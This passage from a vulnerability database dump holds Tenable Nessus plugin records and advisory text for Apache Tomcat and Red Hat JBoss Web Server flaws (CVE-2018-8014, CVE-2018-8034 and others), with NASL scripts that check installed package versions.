(!empty_or_null(uvp)) audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP3\", \"EulerOS UVP \" + uvp);\n\nif (!get_kb_item(\"Host/EulerOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"aarch64\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"EulerOS\", cpu);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_ARCH_NOT, \"i686 / x86_64\", cpu);\n\nflag = 0;\n\npkgs = [\"tomcat-7.0.76-3.h1\",\n \"tomcat-admin-webapps-7.0.76-3.h1\",\n \"tomcat-el-2.2-api-7.0.76-3.h1\",\n \"tomcat-jsp-2.2-api-7.0.76-3.h1\",\n \"tomcat-lib-7.0.76-3.h1\",\n \"tomcat-servlet-3.0-api-7.0.76-3.h1\",\n \"tomcat-webapps-7.0.76-3.h1\"];\n\nforeach (pkg in pkgs)\n if (rpm_check(release:\"EulerOS-2.0\", sp:\"3\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n 
severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"tomcat\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:29:42", "description": "The version of Apache Tomcat installed on the remote host is 8.0.x prior to 8.0.53. It is, therefore, affected by multiple vulnerabilities.", "cvss3": {}, "published": "2018-07-13T00:00:00", "type": "nessus", "title": "Apache Tomcat 8.0.0 < 8.0.53 Security Constraint Weakness", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-8014", "CVE-2018-8034"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:apache:tomcat"], "id": "TOMCAT_8_0_53.NASL", "href": "https://www.tenable.com/plugins/nessus/111067", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(111067);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-2018-8014\", \"CVE-2018-8034\");\n script_bugtraq_id(104203);\n\n script_name(english:\"Apache Tomcat 8.0.0 < 8.0.53 Security Constraint Weakness\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Apache Tomcat server is affected by multiple\nvulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Apache Tomcat installed on the remote host is 8.0.x\nprior to 8.0.53. 
It is, therefore, affected by multiple \nvulnerabilities.\");\n # http://tomcat.apache.org/security-8.html#Fixed_in_Apache_Tomcat_8.0.53\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?cea2044a\");\n # https://portswigger.net/blog/exploiting-cors-misconfigurations-for-bitcoins-and-bounties\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?d5ab19d6\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Apache Tomcat version 8.0.53 or later.\");\n script_set_attribute(attribute:\"agent\", value:\"all\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2018-8014\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/02/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/02/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/07/13\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"combined\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apache:tomcat\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Web Servers\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2022 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"tomcat_error_version.nasl\", \"tomcat_win_installed.nbin\", \"apache_tomcat_nix_installed.nbin\");\n script_require_keys(\"installed_sw/Apache Tomcat\");\n\n exit(0);\n}\n\ninclude(\"tomcat_version.inc\");\n\ntomcat_check_version(fixed:\"8.0.53\", min:\"8.0.0\", severity:SECURITY_HOLE, granularity_regex:\"^8(\\.0)?$\");\n\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-24T14:09:34", "description": "An update is now available for Red Hat JBoss Web Server 5.0 for RHEL 6 and Red Hat JBoss Web Server 5.0 for RHEL 7.\n\nRed Hat Product Security has rated this release as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.\n\nRed Hat JBoss Web Server is a fully integrated and certified set of components for hosting Java web applications. It is comprised of the Apache Tomcat Servlet container, JBoss HTTP Connector (mod_cluster), the PicketLink Vault extension for Apache Tomcat, and the Tomcat Native library.\n\nThis release of Red Hat JBoss Web Server 5.0 Service Pack 2 serves as a replacement for Red Hat JBoss Web Server 5.0 Service Pack 1, and includes bug fixes, which are documented in the Release Notes document linked to in the References.\n\nSecurity Fix(es) :\n\n* tomcat: Insecure defaults in CORS filter enable 'supportsCredentials' for all origins (CVE-2018-8014)\n\n* tomcat: host name verification missing in WebSocket client (CVE-2018-8034)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "cvss3": {}, "published": "2019-03-05T00:00:00", "type": "nessus", "title": "RHEL 6 / 7 : Red Hat JBoss Web Server 5.0 Service Pack 2 (RHSA-2019:0451)", "bulletinFamily": "scanner", "cvss2": {}, 
"cvelist": ["CVE-2018-8014", "CVE-2018-8034"], "modified": "2020-02-06T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:jws5-python-javapackages", "p-cpe:/a:redhat:enterprise_linux:jws5-tomcat", "p-cpe:/a:redhat:enterprise_linux:jws5-tomcat-admin-webapps", "p-cpe:/a:redhat:enterprise_linux:jws5-tomcat-docs-webapp", "p-cpe:/a:redhat:enterprise_linux:jws5-tomcat-el-3.0-api", "p-cpe:/a:redhat:enterprise_linux:jws5-tomcat-javadoc", "p-cpe:/a:redhat:enterprise_linux:jws5-tomcat-jsp-2.3-api", "p-cpe:/a:redhat:enterprise_linux:jws5-tomcat-jsvc", "p-cpe:/a:redhat:enterprise_linux:jws5-tomcat-lib", "p-cpe:/a:redhat:enterprise_linux:jws5-tomcat-native", "p-cpe:/a:redhat:enterprise_linux:jws5-tomcat-native-debuginfo", "p-cpe:/a:redhat:enterprise_linux:jws5-tomcat-selinux", "p-cpe:/a:redhat:enterprise_linux:jws5-tomcat-servlet-4.0-api", "p-cpe:/a:redhat:enterprise_linux:jws5-tomcat-vault", "p-cpe:/a:redhat:enterprise_linux:jws5-tomcat-vault-javadoc", "p-cpe:/a:redhat:enterprise_linux:jws5-tomcat-webapps", "cpe:/o:redhat:enterprise_linux:6", "cpe:/o:redhat:enterprise_linux:7", "p-cpe:/a:redhat:enterprise_linux:jws5-ecj", "p-cpe:/a:redhat:enterprise_linux:jws5-javapackages-tools", "p-cpe:/a:redhat:enterprise_linux:jws5-jboss-logging", "p-cpe:/a:redhat:enterprise_linux:jws5-mod_cluster", "p-cpe:/a:redhat:enterprise_linux:jws5-mod_cluster-tomcat"], "id": "REDHAT-RHSA-2019-0451.NASL", "href": "https://www.tenable.com/plugins/nessus/122606", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2019:0451. 
The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(122606);\n script_version(\"1.5\");\n script_cvs_date(\"Date: 2020/02/06\");\n\n script_cve_id(\"CVE-2018-8014\", \"CVE-2018-8034\");\n script_xref(name:\"RHSA\", value:\"2019:0451\");\n\n script_name(english:\"RHEL 6 / 7 : Red Hat JBoss Web Server 5.0 Service Pack 2 (RHSA-2019:0451)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"An update is now available for Red Hat JBoss Web Server 5.0 for RHEL 6\nand Red Hat JBoss Web Server 5.0 for RHEL 7.\n\nRed Hat Product Security has rated this release as having a security\nimpact of Moderate. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nRed Hat JBoss Web Server is a fully integrated and certified set of\ncomponents for hosting Java web applications. 
It is comprised of the\nApache Tomcat Servlet container, JBoss HTTP Connector (mod_cluster),\nthe PicketLink Vault extension for Apache Tomcat, and the Tomcat\nNative library.\n\nThis release of Red Hat JBoss Web Server 5.0 Service Pack 2 serves as\na replacement for Red Hat JBoss Web Server 5.0 Service Pack 1, and\nincludes bug fixes, which are documented in the Release Notes document\nlinked to in the References.\n\nSecurity Fix(es) :\n\n* tomcat: Insecure defaults in CORS filter enable\n'supportsCredentials' for all origins (CVE-2018-8014)\n\n* tomcat: host name verification missing in WebSocket client\n(CVE-2018-8034)\n\nFor more details about the security issue(s), including the impact, a\nCVSS score, acknowledgments, and other related information, refer to\nthe CVE page(s) listed in the References section.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2019:0451\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2018-8014\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2018-8034\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jws5-ecj\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jws5-javapackages-tools\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:redhat:enterprise_linux:jws5-jboss-logging\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jws5-mod_cluster\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jws5-mod_cluster-tomcat\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jws5-python-javapackages\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jws5-tomcat\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jws5-tomcat-admin-webapps\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jws5-tomcat-docs-webapp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jws5-tomcat-el-3.0-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jws5-tomcat-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jws5-tomcat-jsp-2.3-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jws5-tomcat-jsvc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jws5-tomcat-lib\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jws5-tomcat-native\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jws5-tomcat-native-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jws5-tomcat-selinux\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jws5-tomcat-servlet-4.0-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jws5-tomcat-vault\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jws5-tomcat-vault-javadoc\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:redhat:enterprise_linux:jws5-tomcat-webapps\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/05/16\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/03/04\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/03/05\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2019-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! 
preg(pattern:\"^(6|7)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 6.x / 7.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2019:0451\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL6\", reference:\"jws5-ecj-4.6.1-6.redhat_1.1.el6jws\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jws5-javapackages-tools-3.4.1-5.15.10.el6jws\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jws5-jboss-logging-3.3.1-5.Final_redhat_1.1.el6jws\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jws5-mod_cluster-1.4.0-9.Final_redhat_1.1.el6jws\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jws5-mod_cluster-tomcat-1.4.0-9.Final_redhat_1.1.el6jws\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jws5-python-javapackages-3.4.1-5.15.10.el6jws\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jws5-tomcat-9.0.7-17.redhat_16.1.el6jws\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jws5-tomcat-admin-webapps-9.0.7-17.redhat_16.1.el6jws\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jws5-tomcat-docs-webapp-9.0.7-17.redhat_16.1.el6jws\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jws5-tomcat-el-3.0-api-9.0.7-17.redhat_16.1.el6jws\")) flag++;\n if 
(rpm_check(release:\"RHEL6\", reference:\"jws5-tomcat-javadoc-9.0.7-17.redhat_16.1.el6jws\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jws5-tomcat-jsp-2.3-api-9.0.7-17.redhat_16.1.el6jws\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jws5-tomcat-jsvc-9.0.7-17.redhat_16.1.el6jws\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jws5-tomcat-lib-9.0.7-17.redhat_16.1.el6jws\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"jws5-tomcat-native-1.2.17-26.redhat_26.el6jws\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"jws5-tomcat-native-1.2.17-26.redhat_26.el6jws\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"jws5-tomcat-native-debuginfo-1.2.17-26.redhat_26.el6jws\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"jws5-tomcat-native-debuginfo-1.2.17-26.redhat_26.el6jws\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jws5-tomcat-selinux-9.0.7-17.redhat_16.1.el6jws\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jws5-tomcat-servlet-4.0-api-9.0.7-17.redhat_16.1.el6jws\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jws5-tomcat-vault-1.1.7-5.Final_redhat_2.1.el6jws\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jws5-tomcat-vault-javadoc-1.1.7-5.Final_redhat_2.1.el6jws\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jws5-tomcat-webapps-9.0.7-17.redhat_16.1.el6jws\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", reference:\"jws5-ecj-4.6.1-6.redhat_1.1.el7jws\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"jws5-javapackages-tools-3.4.1-5.15.10.el7jws\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"jws5-jboss-logging-3.3.1-5.Final_redhat_1.1.el7jws\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"jws5-mod_cluster-1.4.0-9.Final_redhat_1.1.el7jws\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"jws5-mod_cluster-tomcat-1.4.0-9.Final_redhat_1.1.el7jws\")) 
flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"jws5-python-javapackages-3.4.1-5.15.10.el7jws\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"jws5-tomcat-9.0.7-17.redhat_16.1.el7jws\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"jws5-tomcat-admin-webapps-9.0.7-17.redhat_16.1.el7jws\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"jws5-tomcat-docs-webapp-9.0.7-17.redhat_16.1.el7jws\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"jws5-tomcat-el-3.0-api-9.0.7-17.redhat_16.1.el7jws\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"jws5-tomcat-javadoc-9.0.7-17.redhat_16.1.el7jws\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"jws5-tomcat-jsp-2.3-api-9.0.7-17.redhat_16.1.el7jws\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"jws5-tomcat-jsvc-9.0.7-17.redhat_16.1.el7jws\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"jws5-tomcat-lib-9.0.7-17.redhat_16.1.el7jws\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"jws5-tomcat-native-1.2.17-26.redhat_26.el7jws\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"jws5-tomcat-native-debuginfo-1.2.17-26.redhat_26.el7jws\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"jws5-tomcat-selinux-9.0.7-17.redhat_16.1.el7jws\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"jws5-tomcat-servlet-4.0-api-9.0.7-17.redhat_16.1.el7jws\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"jws5-tomcat-vault-1.1.7-5.Final_redhat_2.1.el7jws\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"jws5-tomcat-vault-javadoc-1.1.7-5.Final_redhat_2.1.el7jws\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"jws5-tomcat-webapps-9.0.7-17.redhat_16.1.el7jws\")) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) 
audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"jws5-ecj / jws5-javapackages-tools / jws5-jboss-logging / etc\");\n }\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-24T14:22:09", "description": "The version of Apache Tomcat installed on the remote host is version 8.0.x prior to 8.0.53. It is, therefore, affected by multiple vulnerabilities:\n\n - The default settings for the CORS filter are insecure and enable supportsCredentials for all origins. It is expected that users of the CORS filter will have configured it appropriately for their environment rather than using it in the default configuration. Therefore, it is expected that most users will not be impacted by this issue. (CVE-2018-8014)\n\n - A vulnerability exists that could allow a remote attacker to bypass security restrictions, caused by a missing host name verification when using TLS with the WebSocket client. An attacker could exploit this vulnerability to bypass security constraints to access restricted resources. (CVE-2018-8034)", "cvss3": {}, "published": "2019-05-13T00:00:00", "type": "nessus", "title": "Apache Tomcat 8.0.x < 8.0.53 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-8014", "CVE-2018-8034"], "modified": "2019-05-13T00:00:00", "cpe": ["cpe:/a:apache:tomcat"], "id": "700689.PASL", "href": "https://www.tenable.com/plugins/nnm/700689", "sourceData": "Binary data 700689.pasl", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:29:42", "description": "The version of Apache Tomcat installed on the remote host is at least 7.0.41 and prior to 7.0.90. 
It is, therefore, affected by multiple vulnerabilities.", "cvss3": {}, "published": "2018-07-24T00:00:00", "type": "nessus", "title": "Apache Tomcat 7.0.41 < 7.0.90 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-8014", "CVE-2018-8034"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:apache:tomcat"], "id": "TOMCAT_7_0_89.NASL", "href": "https://www.tenable.com/plugins/nessus/111066", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(111066);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-2018-8014\", \"CVE-2018-8034\");\n script_bugtraq_id(104203);\n\n script_name(english:\"Apache Tomcat 7.0.41 < 7.0.90 Multiple Vulnerabilities\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Apache Tomcat server is affected by multiple \nvulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Apache Tomcat installed on the remote host is \nat least 7.0.41 and prior to 7.0.90. 
It is, therefore, affected by \nmultiple vulnerabilities.\");\n # https://tomcat.apache.org/security-7.html#Fixed_in_Apache_Tomcat_7.0.89\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?8757ab94\");\n # https://tomcat.apache.org/security-7.html#Fixed_in_Apache_Tomcat_7.0.90\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?45836195\");\n # https://portswigger.net/blog/exploiting-cors-misconfigurations-for-bitcoins-and-bounties\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?d5ab19d6\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Apache Tomcat version 7.0.90 or later.\");\n script_set_attribute(attribute:\"agent\", value:\"all\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2018-8014\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/02/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/07/07\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/07/24\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"combined\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apache:tomcat\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Web Servers\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2022 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"tomcat_error_version.nasl\", \"tomcat_win_installed.nbin\", \"apache_tomcat_nix_installed.nbin\");\n script_require_keys(\"installed_sw/Apache Tomcat\");\n\n exit(0);\n}\n\ninclude(\"tomcat_version.inc\");\n\ntomcat_check_version(fixed:\"7.0.90\", min:\"7.0.41\", severity:SECURITY_HOLE, granularity_regex:\"^7(\\.0)?$\");\n\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-24T14:27:00", "description": "Several minor issues have been fixed in tomcat8, a Java Servlet and JSP engine.\n\nCVE-2016-5388\n\nApache Tomcat, when the CGI Servlet is enabled, follows RFC 3875 section 4.1.18 and therefore does not protect applications from the presence of untrusted client data in the HTTP_PROXY environment variable, which might allow remote attackers to redirect an application's outbound HTTP traffic to an arbitrary proxy server via a crafted Proxy header in an HTTP request, aka an 'httpoxy' issue. The 'cgi' servlet now has an 'envHttpHeaders' parameter to filter environment variables.\n\nCVE-2018-8014\n\nThe default settings for the CORS filter provided in Apache Tomcat are insecure and enable 'supportsCredentials' for all origins. It is expected that users of the CORS filter will have configured it appropriately for their environment rather than using it in the default configuration. Therefore, it is expected that most users will not be impacted by this issue.\n\nCVE-2019-0221\n\nThe SSI printenv command in Apache Tomcat echoes user-provided data without escaping and is, therefore, vulnerable to XSS. SSI is disabled by default. The printenv command is intended for debugging and is unlikely to be present in a production website.\n\nFor Debian 8 'Jessie', these problems have been fixed in version 8.0.14-1+deb8u15.\n\nWe recommend that you upgrade your tomcat8 packages.\n\nNOTE: Tenable Network Security has extracted the preceding description block directly from the DLA security advisory. 
